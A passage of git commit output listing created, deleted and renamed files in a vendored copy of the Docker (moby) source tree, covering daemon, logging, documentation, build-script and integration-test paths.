vendor/github.com/docker/docker/daemon/getsize_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/copy/copy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/copy/copy_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/device_setup.go delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay2.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/copy_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/quota_unsupported.go delete mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/image.go delete mode 100644 vendor/github.com/docker/docker/daemon/image_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/images/cache.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_builder.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_commit.go rename vendor/github.com/docker/docker/daemon/{ => images}/image_delete.go (72%) create mode 100644 vendor/github.com/docker/docker/daemon/images/image_events.go rename vendor/github.com/docker/docker/daemon/{ => images}/image_exporter.go (61%) rename vendor/github.com/docker/docker/daemon/{ => images}/image_history.go (60%) rename vendor/github.com/docker/docker/daemon/{import.go => images/image_import.go} (60%) rename vendor/github.com/docker/docker/daemon/{ => images}/image_inspect.go (53%) create mode 100644 vendor/github.com/docker/docker/daemon/images/image_prune.go rename vendor/github.com/docker/docker/daemon/{ => images}/image_pull.go (50%) rename vendor/github.com/docker/docker/daemon/{ => images}/image_push.go (60%) rename vendor/github.com/docker/docker/daemon/{search.go => images/image_search.go} (66%) rename vendor/github.com/docker/docker/daemon/{search_test.go => images/image_search_test.go} (97%) create mode 100644 vendor/github.com/docker/docker/daemon/images/image_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/images/image_windows.go rename vendor/github.com/docker/docker/daemon/{ => images}/images.go (71%) create mode 100644 vendor/github.com/docker/docker/daemon/images/locals.go create mode 100644 vendor/github.com/docker/docker/daemon/images/service.go create mode 100644 vendor/github.com/docker/docker/daemon/info_unix_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go rename vendor/github.com/docker/docker/daemon/{inspect_unix.go => inspect_linux.go} (78%) delete mode 100644 vendor/github.com/docker/docker/daemon/inspect_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/links_linux.go delete mode 100644 vendor/github.com/docker/docker/daemon/links_linux_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/links_notlinux.go create mode 100644 vendor/github.com/docker/docker/daemon/list_test.go create mode 100644 vendor/github.com/docker/docker/daemon/listeners/group_unix.go rename vendor/github.com/docker/docker/{pkg/listeners/listeners_unix.go => daemon/listeners/listeners_linux.go} (75%) rename vendor/github.com/docker/docker/{pkg => daemon}/listeners/listeners_windows.go (94%) create mode 100644 vendor/github.com/docker/docker/daemon/logger/adapter.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/adapter_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging_others.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go rename vendor/github.com/docker/docker/{pkg => daemon/logger/jsonfilelog}/jsonlog/jsonlogbytes.go (76%) create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go rename vendor/github.com/docker/docker/{pkg/ioutils => daemon/logger/loggerutils/multireader}/multireader.go (92%) rename vendor/github.com/docker/docker/{pkg/ioutils => daemon/logger/loggerutils/multireader}/multireader_test.go (91%) delete mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go rename vendor/github.com/docker/docker/daemon/logger/{context.go => loginfo.go} (54%) create mode 100644 vendor/github.com/docker/docker/daemon/logger/metrics.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/plugin_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/proxy.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/ring.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/ring_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/templates/templates.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go create mode 100644 vendor/github.com/docker/docker/daemon/metrics_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/metrics_unsupported.go delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_linux.go delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/monitor_windows.go rename vendor/github.com/docker/docker/{utils => daemon/names}/names.go (86%) create mode 100644 vendor/github.com/docker/docker/daemon/oci.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_linux_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/oci_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/reload.go create mode 100644 vendor/github.com/docker/docker/daemon/reload_test.go create mode 100644 vendor/github.com/docker/docker/daemon/reload_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/reload_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/resize_test.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stats/collector.go rename vendor/github.com/docker/docker/daemon/{stats_collector_unix.go => stats/collector_unix.go} (69%) create mode 100644 vendor/github.com/docker/docker/daemon/stats/collector_windows.go delete mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_solaris.go delete mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_windows.go rename vendor/github.com/docker/docker/{api/fixtures => daemon/testdata}/keyfile (100%) create mode 100644 vendor/github.com/docker/docker/daemon/trustkey.go create mode 100644 vendor/github.com/docker/docker/daemon/trustkey_test.go delete mode 100644 vendor/github.com/docker/docker/daemon/update_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/util_test.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_linux_test.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unix_test.go create mode 100644 vendor/github.com/docker/docker/distribution/errors_test.go delete mode 100644 vendor/github.com/docker/docker/docs/README.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/README.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/contributor-edit.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/copy_url.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/fork_docker.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/git_bash.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/images/list_example.png create mode 100644 vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/set-up-git.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/software-req-win.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/software-required.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/test.md create mode 100644 vendor/github.com/docker/docker/docs/contributing/who-written-for.md delete mode 100644 vendor/github.com/docker/docker/docs/deprecated.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/EBS_volume.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/config.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_allow.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_chunked.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_deny.png delete mode 100644 vendor/github.com/docker/docker/docs/extend/index.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/legacy_plugins.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugin_api.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_authorization.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_network.md delete mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_volume.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/builder.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/attach.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/build.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cli.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/commit.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cp.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/deploy.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/diff.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/events.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/exec.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/export.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/history.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/images.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/import.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/index.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/info.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/kill.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/load.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/login.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logout.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logs.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/menu.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pause.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/port.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pull.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/push.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rename.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/restart.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rmi.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/run.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/save.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/search.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/start.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stats.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stop.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_df.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/tag.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/top.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/unpause.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/version.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/wait.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/glossary.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/index.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/run.md delete mode 100644 vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png create mode 100644 vendor/github.com/docker/docker/docs/static_files/moby-project-logo.png create mode 100644 vendor/github.com/docker/docker/errdefs/defs.go create mode 100644 vendor/github.com/docker/docker/errdefs/doc.go create mode 100644 vendor/github.com/docker/docker/errdefs/helpers.go create mode 100644 vendor/github.com/docker/docker/errdefs/helpers_test.go create mode 100644 vendor/github.com/docker/docker/errdefs/is.go delete mode 100644 vendor/github.com/docker/docker/experimental/README.md delete mode 100644 vendor/github.com/docker/docker/experimental/checkpoint-restore.md delete mode 100644 vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg delete mode 100644 vendor/github.com/docker/docker/experimental/vlan-networks.md delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/readme.md create mode 100644 vendor/github.com/docker/docker/hack/README.md create mode 100755 vendor/github.com/docker/docker/hack/ci/arm create mode 100755 vendor/github.com/docker/docker/hack/ci/experimental create mode 100755 vendor/github.com/docker/docker/hack/ci/janky create mode 100755 vendor/github.com/docker/docker/hack/ci/powerpc create mode 100755 vendor/github.com/docker/docker/hack/ci/z delete mode 100755 vendor/github.com/docker/docker/hack/dockerfile/binaries-commits delete mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/containerd.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/dockercli.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/gometalinter.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/install.sh create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/proxy.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/runc.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/tini.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/tomlv.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/vndr.installer delete mode 100644 vendor/github.com/docker/docker/hack/install.sh create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/compat delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/control delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docs delete mode 100755 vendor/github.com/docker/docker/hack/make/.build-deb/rules delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec delete mode 100644 vendor/github.com/docker/docker/hack/make/binary-client delete mode 100644 vendor/github.com/docker/docker/hack/make/build-deb mode change 100644 => 100755 vendor/github.com/docker/docker/hack/make/build-integration-test-binary delete mode 100644 vendor/github.com/docker/docker/hack/make/build-rpm delete mode 100755 vendor/github.com/docker/docker/hack/make/clean-apt-repo delete mode 100755 vendor/github.com/docker/docker/hack/make/clean-yum-repo delete mode 100644 vendor/github.com/docker/docker/hack/make/cover delete mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-client delete mode 100755 vendor/github.com/docker/docker/hack/make/generate-index-listing delete mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-client delete mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-daemon delete mode 100644 vendor/github.com/docker/docker/hack/make/install-script delete mode 100755 vendor/github.com/docker/docker/hack/make/release-deb delete mode 100755 vendor/github.com/docker/docker/hack/make/release-rpm delete mode 100755 vendor/github.com/docker/docker/hack/make/sign-repos delete mode 100755 vendor/github.com/docker/docker/hack/make/test-deb-install delete mode 100755 vendor/github.com/docker/docker/hack/make/test-install-script create mode 100755 vendor/github.com/docker/docker/hack/make/test-integration delete mode 100755 vendor/github.com/docker/docker/hack/make/test-old-apt-repo delete mode 100644 vendor/github.com/docker/docker/hack/make/test-unit delete mode 100644 vendor/github.com/docker/docker/hack/make/tgz delete mode 100644 vendor/github.com/docker/docker/hack/make/ubuntu delete mode 100755 vendor/github.com/docker/docker/hack/make/update-apt-repo delete mode 100644 vendor/github.com/docker/docker/hack/make/win delete mode 100755 vendor/github.com/docker/docker/hack/release.sh create mode 100755 vendor/github.com/docker/docker/hack/test/e2e-run.sh create mode 100755 vendor/github.com/docker/docker/hack/test/unit create mode 100755 vendor/github.com/docker/docker/hack/validate/changelog-date-descending create mode 100755 vendor/github.com/docker/docker/hack/validate/changelog-well-formed delete mode 100755 vendor/github.com/docker/docker/hack/validate/compose-bindata create mode 100755 vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli delete mode 100755 vendor/github.com/docker/docker/hack/validate/gofmt create mode 100755 vendor/github.com/docker/docker/hack/validate/gometalinter create mode 100644 vendor/github.com/docker/docker/hack/validate/gometalinter.json delete mode 100755 vendor/github.com/docker/docker/hack/validate/lint delete mode 100755 vendor/github.com/docker/docker/hack/validate/vet rename vendor/github.com/docker/docker/{daemon => image/cache}/cache.go (72%) rename vendor/github.com/docker/docker/{runconfig => image/cache}/compare.go (82%) rename vendor/github.com/docker/docker/{runconfig => image/cache}/compare_test.go (68%) create mode 100644 vendor/github.com/docker/docker/image/spec/README.md rename vendor/github.com/docker/docker/{pkg/integration => integration-cli}/checker/checker.go (95%) create mode 100644 vendor/github.com/docker/docker/integration-cli/cli/build/build.go create mode 100644 vendor/github.com/docker/docker/integration-cli/cli/cli.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon/daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm.go rename vendor/github.com/docker/docker/integration-cli/{daemon_swarm_hack.go => daemon_swarm_hack_test.go} (77%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_unix.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_windows.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go rename vendor/github.com/docker/docker/integration-cli/{docker_cli_cp_utils.go => docker_cli_cp_utils_test.go} (76%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go delete mode 100644 